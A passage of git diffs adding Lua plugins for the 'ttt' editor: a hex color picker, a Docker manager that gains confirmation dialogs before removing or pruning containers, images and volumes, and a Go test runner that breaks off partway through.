+      { name = "Peach Puff",   hex = "#ffdab9" },
+      { name = "Moccasin",     hex = "#ffe4b5" },
+      { name = "Sandy Brown",  hex = "#f4a460" },
+      { name = "Chocolate",    hex = "#d2691e" },
+      { name = "Saddle Brown", hex = "#8b4513" },
+      { name = "Sienna",       hex = "#a0522d" },
+    },
+  },
+  {
+    name = "Greens",
+    colors = {
+      { name = "Lime",         hex = "#00ff00" },
+      { name = "Lime Green",   hex = "#32cd32" },
+      { name = "Light Green",  hex = "#90ee90" },
+      { name = "Pale Green",   hex = "#98fb98" },
+      { name = "Spring Green", hex = "#00ff7f" },
+      { name = "Medium Sea Green", hex = "#3cb371" },
+      { name = "Forest Green", hex = "#228b22" },
+      { name = "Dark Green",   hex = "#006400" },
+      { name = "Olive",        hex = "#808000" },
+      { name = "Olive Drab",   hex = "#6b8e23" },
+    },
+  },
+  {
+    name = "Blues",
+    colors = {
+      { name = "Light Blue",   hex = "#add8e6" },
+      { name = "Sky Blue",     hex = "#87ceeb" },
+      { name = "Cornflower",   hex = "#6495ed" },
+      { name = "Dodger Blue",  hex = "#1e90ff" },
+      { name = "Royal Blue",   hex = "#4169e1" },
+      { name = "Steel Blue",   hex = "#4682b4" },
+      { name = "Medium Blue",  hex = "#0000cd" },
+      { name = "Navy",         hex = "#000080" },
+      { name = "Teal",         hex = "#008080" },
+      { name = "Dark Cyan",    hex = "#008b8b" },
+    },
+  },
+  {
+    name = "Purples & Pinks",
+    colors = {
+      { name = "Lavender",     hex = "#e6e6fa" },
+      { name = "Plum",         hex = "#dda0dd" },
+      { name = "Violet",       hex = "#ee82ee" },
+      { name = "Orchid",       hex = "#da70d6" },
+      { name = "Fuchsia",      hex = "#ff00ff" },
+      { name = "Medium Purple", hex = "#9370db" },
+      { name = "Blue Violet",  hex = "#8a2be2" },
+      { name = "Indigo",       hex = "#4b0082" },
+      { name = "Hot Pink",     hex = "#ff69b4" },
+      { name = "Deep Pink",    hex = "#ff1493" },
+    },
+  },
+}
+
+-- Insert a hex color at the current cursor position
+local function insert_color(hex)
+  local pos = editor.cursor()
+  editor.insert(pos.line, pos.col, hex)
+  ttt.log("Inserted: " .. hex)
+  ttt.close_drawer()
+end
+
+-- Build list items for a palette category
+local function build_items(palette)
+  local items = {}
+  for _, color in ipairs(palette.colors) do
+    table.insert(items, {
+      id = color.hex,
+      label = color.name,
+      badge = color.hex,
+    })
+  end
+  return items
+end
+
+-- Open the color picker drawer
+local function open_color_picker()
+  ttt.open_drawer({
+    width = 36,
+    min_width = 28,
+    render = function(panel)
+      panel:title({ text = "Color Picker", margin_bottom = 1, padding_left = 1 })
+
+      for _, palette in ipairs(palettes) do
+        panel:label({
+          text = palette.name,
+          style = "muted",
+          badge = tostring(#palette.colors),
+          padding_left = 1,
+          padding_right = 1,
+          margin_top = 1,
+        })
+        panel:box({
+          border = true,
+          render = function(bp)
+            bp:list({
+              items = build_items(palette),
+              on_command = function(command, node)
+                if command == "activate" then
+                  insert_color(node.id)
+                end
+              end,
+            })
+          end,
+        })
+      end
+    end,
+  })
+end
+
+-- Register the plugin
+ttt.register({
+  commands = {
+    {
+      id = "colorPicker.open",
+      title = "Color Picker: Open",
+      handler = open_color_picker,
+    },
+  },
+  keybindings = {
+    { key = "ctrl+k c", command = "colorPicker.open" },
+  },
+})

--- a/plugins/color-picker/plugin.ttt.json
+++ b/plugins/color-picker/plugin.ttt.json
@@ -1,0 +1,14 @@
+{
+  "name": "color-picker",
+  "description": "Open a drawer with color swatches. Click a color to insert its hex value at the cursor.",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.drawer": true,
+    "commands": true,
+    "keybindings": true,
+    "editor.read": true,
+    "editor.write": true
+  }
+}

--- a/plugins/docker-manager/init.lua
+++ b/plugins/docker-manager/init.lua
@@ -103,40 +103,46 @@ local function container_stop(name, panel) container_action("stop", name, panel)
 local function container_restart(name, panel) container_action("restart", name, panel) end
 
 local function container_remove(name, panel)
-  ttt.log("info", "removing container: " .. name)
-  sys.exec_async("docker", {"rm", "-f", name}, function(result)
-    if result.exit_code == 0 then
-      ttt.log("info", "removed " .. name)
-    else
-      ttt.log("error", "remove " .. name .. ": " .. result.stderr)
-    end
-    refresh_containers(panel)
+  ttt.confirm("Remove container '" .. name .. "'?", function()
+    ttt.log("info", "removing container: " .. name)
+    sys.exec_async("docker", {"rm", "-f", name}, function(result)
+      if result.exit_code == 0 then
+        ttt.log("info", "removed " .. name)
+      else
+        ttt.log("error", "remove " .. name .. ": " .. result.stderr)
+      end
+      refresh_containers(panel)
+    end)
   end)
 end
 
 -- Image actions
 local function image_remove(id, panel)
-  ttt.log("info", "removing image: " .. id)
-  sys.exec_async("docker", {"rmi", id}, function(result)
-    if result.exit_code == 0 then
-      ttt.log("info", "removed image " .. id)
-    else
-      ttt.log("error", "remove image: " .. result.stderr)
-    end
-    refresh_images(panel)
+  ttt.confirm("Remove image '" .. id .. "'?", function()
+    ttt.log("info", "removing image: " .. id)
+    sys.exec_async("docker", {"rmi", id}, function(result)
+      if result.exit_code == 0 then
+        ttt.log("info", "removed image " .. id)
+      else
+        ttt.log("error", "remove image: " .. result.stderr)
+      end
+      refresh_images(panel)
+    end)
   end)
 end
 
 -- Volume actions
 local function volume_remove(name, panel)
-  ttt.log("info", "removing volume: " .. name)
-  sys.exec_async("docker", {"volume", "rm", name}, function(result)
-    if result.exit_code == 0 then
-      ttt.log("info", "removed volume " .. name)
-    else
-      ttt.log("error", "remove volume: " .. result.stderr)
-    end
-    refresh_volumes(panel)
+  ttt.confirm("Remove volume '" .. name .. "'?", function()
+    ttt.log("info", "removing volume: " .. name)
+    sys.exec_async("docker", {"volume", "rm", name}, function(result)
+      if result.exit_code == 0 then
+        ttt.log("info", "removed volume " .. name)
+      else
+        ttt.log("error", "remove volume: " .. result.stderr)
+      end
+      refresh_volumes(panel)
+    end)
   end)
 end
 
@@ -202,38 +208,44 @@ local function cmd_refresh()
 end
 
 local function cmd_prune_containers()
-  ttt.log("info", "pruning stopped containers...")
-  sys.exec_async("docker", {"container", "prune", "-f"}, function(result)
-    if result.exit_code == 0 then
-      ttt.log("info", "container prune: ok")
-    else
-      ttt.log("error", "container prune: " .. result.stderr)
-    end
-    refresh_containers(last_panel)
+  ttt.confirm("Prune all stopped containers?", function()
+    ttt.log("info", "pruning stopped containers...")
+    sys.exec_async("docker", {"container", "prune", "-f"}, function(result)
+      if result.exit_code == 0 then
+        ttt.log("info", "container prune: ok")
+      else
+        ttt.log("error", "container prune: " .. result.stderr)
+      end
+      refresh_containers(last_panel)
+    end)
   end)
 end
 
 local function cmd_prune_images()
-  ttt.log("info", "pruning unused images...")
-  sys.exec_async("docker", {"image", "prune", "-f"}, function(result)
-    if result.exit_code == 0 then
-      ttt.log("info", "image prune: ok")
-    else
-      ttt.log("error", "image prune: " .. result.stderr)
-    end
-    refresh_images(last_panel)
+  ttt.confirm("Prune all unused images?", function()
+    ttt.log("info", "pruning unused images...")
+    sys.exec_async("docker", {"image", "prune", "-f"}, function(result)
+      if result.exit_code == 0 then
+        ttt.log("info", "image prune: ok")
+      else
+        ttt.log("error", "image prune: " .. result.stderr)
+      end
+      refresh_images(last_panel)
+    end)
   end)
 end
 
 local function cmd_prune_volumes()
-  ttt.log("info", "pruning unused volumes...")
-  sys.exec_async("docker", {"volume", "prune", "-f"}, function(result)
-    if result.exit_code == 0 then
-      ttt.log("info", "volume prune: ok")
-    else
-      ttt.log("error", "volume prune: " .. result.stderr)
-    end
-    refresh_volumes(last_panel)
+  ttt.confirm("Prune all unused volumes?", function()
+    ttt.log("info", "pruning unused volumes...")
+    sys.exec_async("docker", {"volume", "prune", "-f"}, function(result)
+      if result.exit_code == 0 then
+        ttt.log("info", "volume prune: ok")
+      else
+        ttt.log("error", "volume prune: " .. result.stderr)
+      end
+      refresh_volumes(last_panel)
+    end)
   end)
 end
 

--- a/plugins/docker-manager/init.lua
+++ b/plugins/docker-manager/init.lua
@@ -241,6 +241,30 @@ end
 ttt.register({
   sidebar = {
     title = "Docker",
+    actions = {
+      { label = "Refresh All", command = "docker.sidebarAction.refresh" },
+      { separator = true },
+      { label = "Prune Containers", command = "docker.sidebarAction.pruneContainers" },
+      { label = "Prune Images", command = "docker.sidebarAction.pruneImages" },
+      { label = "Prune Volumes", command = "docker.sidebarAction.pruneVolumes" },
+      { separator = true },
+      { label = "Help", command = "docker.sidebarAction.help" },
+    },
+    on_action = function(command)
+      if command == "docker.sidebarAction.refresh" then refresh_all(last_panel)
+      elseif command == "docker.sidebarAction.pruneContainers" then cmd_prune_containers()
+      elseif command == "docker.sidebarAction.pruneImages" then cmd_prune_images()
+      elseif command == "docker.sidebarAction.pruneVolumes" then cmd_prune_volumes()
+      elseif command == "docker.sidebarAction.help" then
+        ttt.show_info("Docker Shortcuts", {
+          { key = "r", value = "Refresh all" },
+          { key = "Right-click", value = "Context menu on item" },
+          { key = "Up / Down", value = "Navigate items" },
+          { key = "Enter", value = "Expand / collapse" },
+          { key = "Ctrl+K r", value = "Refresh (global)" },
+        })
+      end
+    end,
     render = function(panel)
       last_panel = panel
 
@@ -254,30 +278,10 @@ ttt.register({
         return
       end
 
-      panel:dropdown({
-        label = "⋯",
-        entries = {
-          { label = "Refresh All              r", command = "refresh" },
-          { separator = true },
-          { label = "Prune Containers", command = "prune_containers" },
-          { label = "Prune Images", command = "prune_images" },
-          { label = "Prune Volumes", command = "prune_volumes" },
-          { separator = true },
-          { label = "Shortcuts", command = "help" },
-        },
-        on_menu = function(command)
-          if command == "refresh" then refresh_all(panel)
-          elseif command == "prune_containers" then cmd_prune_containers()
-          elseif command == "prune_images" then cmd_prune_images()
-          elseif command == "prune_volumes" then cmd_prune_volumes()
-          end
-        end,
-      })
-
       -- Containers section
       panel:vstack({
         render = function(p)
-          p:label({ text = " CONTAINERS (" .. #containers .. ")", style = "muted" })
+          p:label({ text = " Containers (" .. #containers .. ")", style = "muted" })
           p:box({
             border = true,
             render = function(bp)
@@ -306,7 +310,7 @@ ttt.register({
       -- Images section
       panel:vstack({
         render = function(p)
-          p:label({ text = " IMAGES (" .. #images .. ")", style = "muted" })
+          p:label({ text = " Images (" .. #images .. ")", style = "muted" })
           p:box({
             border = true,
             render = function(bp)
@@ -327,7 +331,7 @@ ttt.register({
       -- Volumes section
       panel:vstack({
         render = function(p)
-          p:label({ text = " VOLUMES (" .. #volumes .. ")", style = "muted" })
+          p:label({ text = " Volumes (" .. #volumes .. ")", style = "muted" })
           p:box({
             border = true,
             render = function(bp)
@@ -366,4 +370,3 @@ ttt.register({
     { key = "ctrl+k r", command = "docker.refresh" },
   },
 })
-

--- a/plugins/docker-manager/init.lua
+++ b/plugins/docker-manager/init.lua
@@ -281,7 +281,7 @@ ttt.register({
       -- Containers section
       panel:vstack({
         render = function(p)
-          p:label({ text = " Containers (" .. #containers .. ")", style = "muted" })
+          p:label({ text = "Containers", badge = tostring(#containers), padding_left = 1, padding_right = 1 })
           p:box({
             border = true,
             render = function(bp)
@@ -310,7 +310,7 @@ ttt.register({
       -- Images section
       panel:vstack({
         render = function(p)
-          p:label({ text = " Images (" .. #images .. ")", style = "muted" })
+          p:label({ text = "Images", badge = tostring(#images), padding_left = 1, padding_right = 1 })
           p:box({
             border = true,
             render = function(bp)
@@ -331,7 +331,7 @@ ttt.register({
       -- Volumes section
       panel:vstack({
         render = function(p)
-          p:label({ text = " Volumes (" .. #volumes .. ")", style = "muted" })
+          p:label({ text = "Volumes", badge = tostring(#volumes), padding_left = 1, padding_right = 1 })
           p:box({
             border = true,
             render = function(bp)

--- a/plugins/docker-manager/init.lua
+++ b/plugins/docker-manager/init.lua
@@ -1,0 +1,369 @@
+local ttt = require("ttt")
+local sys = require("ttt.system")
+
+-- State
+local containers = {}
+local images = {}
+local volumes = {}
+local loading = true
+local initialized = false
+
+-- Parse docker output
+local function parse_lines(stdout)
+  local items = {}
+  for line in stdout:gmatch("[^\n]+") do
+    if line ~= "" then
+      table.insert(items, line)
+    end
+  end
+  return items
+end
+
+local function refresh_containers(panel)
+  sys.exec_async("docker", {"ps", "-a", "--format", "{{.Names}}\t{{.Status}}\t{{.Image}}\t{{.ID}}"}, function(result)
+    containers = {}
+    if result.exit_code == 0 then
+      for _, line in ipairs(parse_lines(result.stdout)) do
+        local name, status, image, id = line:match("^(.-)\t(.-)\t(.-)\t(.+)$")
+        if name then
+          local running = status:match("^Up") ~= nil
+          table.insert(containers, {
+            name = name,
+            status = status,
+            image = image,
+            id = id,
+            running = running,
+          })
+        end
+      end
+    end
+    if panel then panel:redraw() end
+  end)
+end
+
+local function refresh_images(panel)
+  sys.exec_async("docker", {"images", "--format", "{{.Repository}}:{{.Tag}}\t{{.Size}}\t{{.ID}}"}, function(result)
+    images = {}
+    if result.exit_code == 0 then
+      for _, line in ipairs(parse_lines(result.stdout)) do
+        local repo, size, id = line:match("^(.-)\t(.-)\t(.+)$")
+        if repo then
+          table.insert(images, {
+            repo = repo,
+            size = size,
+            id = id,
+          })
+        end
+      end
+    end
+    if panel then panel:redraw() end
+  end)
+end
+
+local function refresh_volumes(panel)
+  sys.exec_async("docker", {"volume", "ls", "--format", "{{.Name}}\t{{.Driver}}"}, function(result)
+    volumes = {}
+    if result.exit_code == 0 then
+      for _, line in ipairs(parse_lines(result.stdout)) do
+        local name, driver = line:match("^(.-)\t(.+)$")
+        if name then
+          table.insert(volumes, {
+            name = name,
+            driver = driver,
+          })
+        end
+      end
+    end
+    loading = false
+    if panel then panel:redraw() end
+  end)
+end
+
+local function refresh_all(panel)
+  refresh_containers(panel)
+  refresh_images(panel)
+  refresh_volumes(panel)
+end
+
+-- Container actions
+local function container_action(action, name, panel)
+  ttt.log("info", action .. " container: " .. name)
+  sys.exec_async("docker", {action, name}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", action .. " " .. name .. ": ok")
+    else
+      ttt.log("error", action .. " " .. name .. ": " .. result.stderr)
+    end
+    refresh_containers(panel)
+  end)
+end
+
+local function container_start(name, panel) container_action("start", name, panel) end
+local function container_stop(name, panel) container_action("stop", name, panel) end
+local function container_restart(name, panel) container_action("restart", name, panel) end
+
+local function container_remove(name, panel)
+  ttt.log("info", "removing container: " .. name)
+  sys.exec_async("docker", {"rm", "-f", name}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", "removed " .. name)
+    else
+      ttt.log("error", "remove " .. name .. ": " .. result.stderr)
+    end
+    refresh_containers(panel)
+  end)
+end
+
+-- Image actions
+local function image_remove(id, panel)
+  ttt.log("info", "removing image: " .. id)
+  sys.exec_async("docker", {"rmi", id}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", "removed image " .. id)
+    else
+      ttt.log("error", "remove image: " .. result.stderr)
+    end
+    refresh_images(panel)
+  end)
+end
+
+-- Volume actions
+local function volume_remove(name, panel)
+  ttt.log("info", "removing volume: " .. name)
+  sys.exec_async("docker", {"volume", "rm", name}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", "removed volume " .. name)
+    else
+      ttt.log("error", "remove volume: " .. result.stderr)
+    end
+    refresh_volumes(panel)
+  end)
+end
+
+-- Build list items
+local function container_items()
+  local items = {}
+  for _, c in ipairs(containers) do
+    local icon = c.running and "●" or "○"
+    local actions = {}
+    if c.running then
+      table.insert(actions, { icon = "■", command = "stop" })
+      table.insert(actions, { icon = "↺", command = "restart" })
+    else
+      table.insert(actions, { icon = "▶", command = "start" })
+      table.insert(actions, { icon = "×", command = "remove" })
+    end
+    table.insert(items, {
+      id = c.name,
+      label = c.name,
+      icon = icon,
+      badge = c.image,
+      actions = actions,
+    })
+  end
+  return items
+end
+
+local function image_items()
+  local items = {}
+  for _, img in ipairs(images) do
+    table.insert(items, {
+      id = img.id,
+      label = img.repo,
+      badge = img.size,
+      actions = {
+        { icon = "×", command = "remove" },
+      },
+    })
+  end
+  return items
+end
+
+local function volume_items()
+  local items = {}
+  for _, vol in ipairs(volumes) do
+    table.insert(items, {
+      id = vol.name,
+      label = vol.name,
+      badge = vol.driver,
+      actions = {
+        { icon = "×", command = "remove" },
+      },
+    })
+  end
+  return items
+end
+
+-- Command handlers
+local last_panel = nil
+
+local function cmd_refresh()
+  refresh_all(last_panel)
+end
+
+local function cmd_prune_containers()
+  ttt.log("info", "pruning stopped containers...")
+  sys.exec_async("docker", {"container", "prune", "-f"}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", "container prune: ok")
+    else
+      ttt.log("error", "container prune: " .. result.stderr)
+    end
+    refresh_containers(last_panel)
+  end)
+end
+
+local function cmd_prune_images()
+  ttt.log("info", "pruning unused images...")
+  sys.exec_async("docker", {"image", "prune", "-f"}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", "image prune: ok")
+    else
+      ttt.log("error", "image prune: " .. result.stderr)
+    end
+    refresh_images(last_panel)
+  end)
+end
+
+local function cmd_prune_volumes()
+  ttt.log("info", "pruning unused volumes...")
+  sys.exec_async("docker", {"volume", "prune", "-f"}, function(result)
+    if result.exit_code == 0 then
+      ttt.log("info", "volume prune: ok")
+    else
+      ttt.log("error", "volume prune: " .. result.stderr)
+    end
+    refresh_volumes(last_panel)
+  end)
+end
+
+-- Registration
+ttt.register({
+  sidebar = {
+    title = "Docker",
+    render = function(panel)
+      last_panel = panel
+
+      if not initialized then
+        initialized = true
+        refresh_all(panel)
+      end
+
+      if loading then
+        panel:label({ text = "Loading...", style = "muted" })
+        return
+      end
+
+      panel:dropdown({
+        label = "⋯",
+        entries = {
+          { label = "Refresh All              r", command = "refresh" },
+          { separator = true },
+          { label = "Prune Containers", command = "prune_containers" },
+          { label = "Prune Images", command = "prune_images" },
+          { label = "Prune Volumes", command = "prune_volumes" },
+          { separator = true },
+          { label = "Shortcuts", command = "help" },
+        },
+        on_menu = function(command)
+          if command == "refresh" then refresh_all(panel)
+          elseif command == "prune_containers" then cmd_prune_containers()
+          elseif command == "prune_images" then cmd_prune_images()
+          elseif command == "prune_volumes" then cmd_prune_volumes()
+          end
+        end,
+      })
+
+      -- Containers section
+      panel:vstack({
+        render = function(p)
+          p:label({ text = " CONTAINERS (" .. #containers .. ")", style = "muted" })
+          p:box({
+            border = true,
+            render = function(bp)
+              bp:list({
+                items = container_items(),
+                on_command = function(command, node)
+                  if command == "start" then container_start(node.id, panel)
+                  elseif command == "stop" then container_stop(node.id, panel)
+                  elseif command == "restart" then container_restart(node.id, panel)
+                  elseif command == "remove" then container_remove(node.id, panel)
+                  end
+                end,
+                node_menu = {
+                  { label = "Start", command = "start" },
+                  { label = "Stop", command = "stop" },
+                  { label = "Restart", command = "restart" },
+                  { separator = true },
+                  { label = "Remove", command = "remove" },
+                },
+              })
+            end,
+          })
+        end,
+      })
+
+      -- Images section
+      panel:vstack({
+        render = function(p)
+          p:label({ text = " IMAGES (" .. #images .. ")", style = "muted" })
+          p:box({
+            border = true,
+            render = function(bp)
+              bp:list({
+                items = image_items(),
+                on_command = function(command, node)
+                  if command == "remove" then image_remove(node.id, panel) end
+                end,
+                node_menu = {
+                  { label = "Remove", command = "remove" },
+                },
+              })
+            end,
+          })
+        end,
+      })
+
+      -- Volumes section
+      panel:vstack({
+        render = function(p)
+          p:label({ text = " VOLUMES (" .. #volumes .. ")", style = "muted" })
+          p:box({
+            border = true,
+            render = function(bp)
+              bp:list({
+                items = volume_items(),
+                on_command = function(command, node)
+                  if command == "remove" then volume_remove(node.id, panel) end
+                end,
+                node_menu = {
+                  { label = "Remove", command = "remove" },
+                },
+              })
+            end,
+          })
+        end,
+      })
+    end,
+
+    on_event = function(event)
+      if event.type == "key" then
+        if event.key == "r" and event.mod == nil then
+          refresh_all(last_panel)
+        end
+      end
+    end,
+  },
+
+  commands = {
+    { id = "docker.refresh", title = "Docker: Refresh", handler = cmd_refresh },
+    { id = "docker.pruneContainers", title = "Docker: Prune Containers", handler = cmd_prune_containers },
+    { id = "docker.pruneImages", title = "Docker: Prune Images", handler = cmd_prune_images },
+    { id = "docker.pruneVolumes", title = "Docker: Prune Volumes", handler = cmd_prune_volumes },
+  },
+
+  keybindings = {
+    { key = "ctrl+k r", command = "docker.refresh" },
+  },
+})
+

--- a/plugins/docker-manager/plugin.ttt.json
+++ b/plugins/docker-manager/plugin.ttt.json
@@ -1,0 +1,13 @@
+{
+  "name": "docker-manager",
+  "description": "Manage Docker containers, images and volumes",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "init.lua",
+  "permissions": {
+    "panel.sidebar": true,
+    "commands": true,
+    "keybindings": true,
+    "system.exec": ["docker"]
+  }
+}

--- a/plugins/go-test-runner/plugin.lua
+++ b/plugins/go-test-runner/plugin.lua
@@ -1,0 +1,502 @@
+local ttt = require("ttt")
+local sys = require("ttt.system")
+local editor = require("ttt.editor")
+
+-- ---------------------------------------------------------------------------
+-- State
+-- ---------------------------------------------------------------------------
+local packages = {}       -- array of {path, name, tests}
+local test_status = {}    -- "importpath::TestName" -> "pass"|"fail"|"running"|"unknown"
+local test_output = {}    -- "importpath::TestName" -> raw -v output
+local test_files = {}     -- "importpath::TestName" -> {file, line}
+local loading = false
+local initialized = false
+local last_panel = nil
+
+-- ---------------------------------------------------------------------------
+-- Helpers
+-- ---------------------------------------------------------------------------
+
+local function status_icon(status)
+  if status == "pass" then return "●"
+  elseif status == "fail" then return "✕"
+  elseif status == "running" then return "⟳"
+  else return "○"
+  end
+end
+
+local function compute_stats()
+  local passed, failed, not_run, running = 0, 0, 0, 0
+  for _, s in pairs(test_status) do
+    if s == "pass" then passed = passed + 1
+    elseif s == "fail" then failed = failed + 1
+    elseif s == "running" then running = running + 1
+    else not_run = not_run + 1
+    end
+  end
+  return passed, failed, not_run, running
+end
+
+local function make_key(pkg_path, test_name)
+  return pkg_path .. "::" .. test_name
+end
+
+local function parse_key(key)
+  return key:match("^(.+)::(.+)$")
+end
+
+-- Find a package entry by import path.
+local function find_package(pkg_path)
+  for _, pkg in ipairs(packages) do
+    if pkg.path == pkg_path then return pkg end
+  end
+  return nil
+end
+
+-- ---------------------------------------------------------------------------
+-- Test discovery
+-- ---------------------------------------------------------------------------
+
+local function discover_tests(panel)
+  loading = true
+  if panel then panel:redraw() end
+
+  sys.exec_async("go", {"test", "-list", ".*", "./..."}, function(result)
+    loading = false
+    packages = {}
+    test_status = {}
+    test_output = {}
+    test_files = {}
+
+    if result.exit_code ~= 0 and (result.stdout == nil or result.stdout == "") then
+      ttt.log("error", "Failed to discover tests: " .. (result.stderr or "unknown error"))
+      if panel then panel:redraw() end
+      return
+    end
+
+    -- Parse stdout: test names interleaved with "ok"/"?"/"FAIL" summary lines.
+    -- Test names appear one per line before the summary line of their package.
+    local current_tests = {}
+    local stdout = result.stdout or ""
+
+    for line in stdout:gmatch("[^\n]+") do
+      local trimmed = line:match("^%s*(.-)%s*$")
+      if trimmed == "" then
+        -- skip blank lines
+      elseif trimmed:match("^ok%s") then
+        local pkg_path = trimmed:match("^ok%s+(%S+)")
+        if pkg_path and #current_tests > 0 then
+          local short_name = pkg_path:match("([^/]+)$") or pkg_path
+          table.insert(packages, { path = pkg_path, name = short_name, tests = {} })
+          local pkg = packages[#packages]
+          for _, t in ipairs(current_tests) do
+            table.insert(pkg.tests, t)
+            test_status[make_key(pkg_path, t)] = "unknown"
+          end
+        end
+        current_tests = {}
+      elseif trimmed:match("^%?%s") then
+        -- no test files — discard collected names (shouldn't be any)
+        current_tests = {}
+      elseif trimmed:match("^FAIL%s") then
+        local pkg_path = trimmed:match("^FAIL%s+(%S+)")
+        if pkg_path then
+          ttt.log("warn", "Package failed to compile: " .. pkg_path)
+        end
+        current_tests = {}
+      elseif trimmed:match("^Test[A-Z_]") then
+        -- Go test function name (must start with Test + uppercase/underscore)
+        local name = trimmed:match("^(%S+)")
+        if name then
+          table.insert(current_tests, name)
+        end
+      end
+      -- ignore Benchmark/Example/Fuzz and other output
+    end
+
+    -- Log stderr warnings (compilation errors, etc.)
+    if result.stderr and result.stderr ~= "" then
+      for line in result.stderr:gmatch("[^\n]+") do
+        if line:match("%S") then
+          ttt.log("warn", line)
+        end
+      end
+    end
+
+    local total = 0
+    for _, pkg in ipairs(packages) do
+      total = total + #pkg.tests
+    end
+    ttt.log("Discovered " .. tostring(total) .. " tests in " .. tostring(#packages) .. " packages")
+    if panel then panel:redraw() end
+  end)
+end
+
+-- ---------------------------------------------------------------------------
+-- Running tests
+-- ---------------------------------------------------------------------------
+
+-- Extract file:line references from go test -v failure output.
+local function extract_failure_location(output, test_name)
+  -- Look for lines like "    foo_test.go:42: expected ..."
+  local capturing = false
+  for line in output:gmatch("[^\n]+") do
+    if line:find("--- FAIL: " .. test_name, 1, true) then
+      capturing = true
+    elseif capturing then
+      local file, line_num = line:match("%s+(%S+_test%.go):(%d+):")
+      if file then
+        return file, tonumber(line_num)
+      end
+    end
+  end
+  -- Fallback: scan entire output for any _test.go reference
+  for line in output:gmatch("[^\n]+") do
+    local file, line_num = line:match("%s+(%S+_test%.go):(%d+):")
+    if file then
+      return file, tonumber(line_num)
+    end
+  end
+  return nil, nil
+end
+
+-- Parse -v output to update status for a set of test names in a package.
+local function parse_verbose_results(output, pkg_path, test_names)
+  for _, test_name in ipairs(test_names) do
+    local key = make_key(pkg_path, test_name)
+    test_output[key] = output
+
+    if output:find("--- PASS: " .. test_name, 1, true) then
+      test_status[key] = "pass"
+    elseif output:find("--- FAIL: " .. test_name, 1, true) then
+      test_status[key] = "fail"
+      local file, line_num = extract_failure_location(output, test_name)
+      if file then
+        test_files[key] = { file = file, line = line_num }
+      end
+    else
+      -- Test may not have run (filtered out, skipped, or build error)
+      if test_status[key] == "running" then
+        test_status[key] = "unknown"
+      end
+    end
+  end
+end
+
+local function run_test(pkg_path, test_name, panel)
+  local key = make_key(pkg_path, test_name)
+  test_status[key] = "running"
+  test_output[key] = ""
+  if panel then panel:redraw() end
+
+  ttt.log("Running " .. test_name .. " in " .. pkg_path)
+
+  sys.exec_async("go", {"test", "-run", "^" .. test_name .. "$", "-v", pkg_path}, function(result)
+    local output = result.stdout or ""
+    parse_verbose_results(output, pkg_path, {test_name})
+
+    local status = test_status[key]
+    if status == "pass" then
+      ttt.log("PASS: " .. test_name)
+    elseif status == "fail" then
+      ttt.log("error", "FAIL: " .. test_name)
+    end
+
+    if panel then panel:redraw() end
+  end)
+end
+
+local function run_package(pkg_path, panel)
+  local pkg = find_package(pkg_path)
+  if not pkg then return end
+
+  for _, test_name in ipairs(pkg.tests) do
+    test_status[make_key(pkg_path, test_name)] = "running"
+  end
+  if panel then panel:redraw() end
+
+  ttt.log("Running all tests in " .. pkg_path)
+
+  sys.exec_async("go", {"test", "-v", pkg_path}, function(result)
+    local output = result.stdout or ""
+    parse_verbose_results(output, pkg_path, pkg.tests)
+
+    local pass_count, fail_count = 0, 0
+    for _, test_name in ipairs(pkg.tests) do
+      local s = test_status[make_key(pkg_path, test_name)]
+      if s == "pass" then pass_count = pass_count + 1
+      elseif s == "fail" then fail_count = fail_count + 1
+      end
+    end
+
+    if fail_count > 0 then
+      ttt.log("error", pkg.name .. ": " .. pass_count .. " passed, " .. fail_count .. " failed")
+    else
+      ttt.log(pkg.name .. ": " .. pass_count .. " passed")
+    end
+
+    if panel then panel:redraw() end
+  end)
+end
+
+local function run_all(panel)
+  -- Mark every known test as running
+  for key, _ in pairs(test_status) do
+    test_status[key] = "running"
+  end
+  if panel then panel:redraw() end
+
+  ttt.log("Running all tests...")
+
+  sys.exec_async("go", {"test", "-v", "./..."}, function(result)
+    local output = result.stdout or ""
+
+    -- Update status for every known test
+    for _, pkg in ipairs(packages) do
+      parse_verbose_results(output, pkg.path, pkg.tests)
+    end
+
+    local passed, failed = compute_stats()
+    if failed > 0 then
+      ttt.log("error", "Tests complete: " .. passed .. " passed, " .. failed .. " failed")
+    else
+      ttt.log("Tests complete: " .. passed .. " passed")
+    end
+
+    if panel then panel:redraw() end
+  end)
+end
+
+-- ---------------------------------------------------------------------------
+-- Tree building
+-- ---------------------------------------------------------------------------
+
+local function build_tree_items()
+  local items = {}
+  for _, pkg in ipairs(packages) do
+    local children = {}
+    local pkg_has_fail = false
+    local pkg_all_pass = #pkg.tests > 0
+    local pkg_has_running = false
+
+    for _, test_name in ipairs(pkg.tests) do
+      local key = make_key(pkg.path, test_name)
+      local status = test_status[key] or "unknown"
+
+      if status == "fail" then pkg_has_fail = true; pkg_all_pass = false end
+      if status ~= "pass" then pkg_all_pass = false end
+      if status == "running" then pkg_has_running = true; pkg_all_pass = false end
+
+      table.insert(children, {
+        id = key,
+        label = test_name,
+        icon = status_icon(status),
+      })
+    end
+
+    -- Aggregate package icon
+    local pkg_icon
+    if pkg_has_running then
+      pkg_icon = status_icon("running")
+    elseif pkg_has_fail then
+      pkg_icon = status_icon("fail")
+    elseif pkg_all_pass then
+      pkg_icon = status_icon("pass")
+    else
+      pkg_icon = status_icon("unknown")
+    end
+
+    table.insert(items, {
+      id = pkg.path,
+      label = pkg.name,
+      icon = pkg_icon,
+      badge = tostring(#pkg.tests),
+      expandable = true,
+      expanded = false,
+      children = children,
+    })
+  end
+  return items
+end
+
+-- ---------------------------------------------------------------------------
+-- Navigation
+-- ---------------------------------------------------------------------------
+
+local function navigate_to_test(key)
+  local info = test_files[key]
+  if not info then
+    ttt.log("warn", "No file location recorded for this test")
+    return
+  end
+
+  ttt.log("Test location: " .. info.file .. ":" .. tostring(info.line))
+
+  -- If the failing test's file is currently open, jump to the line
+  local current = editor.file_name()
+  if current and current == info.file then
+    editor.set_cursor(info.line, 1)
+  else
+    ttt.log("Open " .. info.file .. " and go to line " .. tostring(info.line))
+  end
+end
+
+-- ---------------------------------------------------------------------------
+-- Command handlers
+-- ---------------------------------------------------------------------------
